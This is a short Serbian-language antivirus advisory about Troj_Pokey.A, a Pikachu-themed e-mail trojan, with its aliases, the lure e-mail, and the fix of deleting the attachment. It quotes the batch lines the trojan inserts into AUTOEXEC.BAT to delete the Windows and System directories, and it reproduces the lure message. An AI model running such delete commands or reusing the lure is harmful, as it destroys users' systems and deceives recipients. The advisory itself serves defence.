VIRUS INFO
|
| Naziv
virusa: |
Troj_Pokey.A |
| Alias:
|
POKEY.A,
Pokey, WIN32/Pikachu.32768.Worm, I-Worm.Pikachu,
Pikachu.32768, Pikachup.exe, Pikachupokeymon.exe,
Pokemon Worm, Pokey.bat, W32.Pokemon.Worm,
WIN32/Pikachu.32768 |
| Tip: |
trojanac
i Win32 izvršni fajl virus |
| Način
širenja: |
e-mailom |
| Veličina: |
32
768 bajtova |
Destruktivan:
|
da |
| Datum
aktiviranja: |
|
| Otkriven:
|
24.08.2000.
|
OBJAŠNJENJE
Ovo
je varijanta već poznatog trojanca Pikachu-A.
Stiže
kao e-mail:
Subject: Pikachu Pokemon
Telo poruke:
Great
Friend!
Pikachu from Pokemon Theme have some friendly
words to say.
Visit Pikachu at http://www.pikachu.com See you.
Attachment:
PIKACHU.EXE. ( )
Kada
se pristigli fajl startuje, virus izmeni sadržaj
AUTOEXEC.BAT fajla, u koji ubaci sledeće
redove:
@ECHO
OFF
del C:\WINDOWS\*.*
del C:\WINDOWS\SYSTEM\*.*.
Nakon
toga, prikaže sledeću
sliku.
Virus
resetuje računar i prilikom startovanja AUTOEXEC.BAT
fajla obrišu se direktorijumi C:\ WINDOWS\
i C:\ WINDOWS \ SYSTEM\. U ova dva direktrorijuma
se nalaze fajlovi potrebni za startovanje računara.
REŠENJE
Kada
dobijete ovakav e-mail, nemojte startovati
pristigli fajl. Jednostavno je obrišite.
Uvek treba imati osveženi antivirusni
program.
|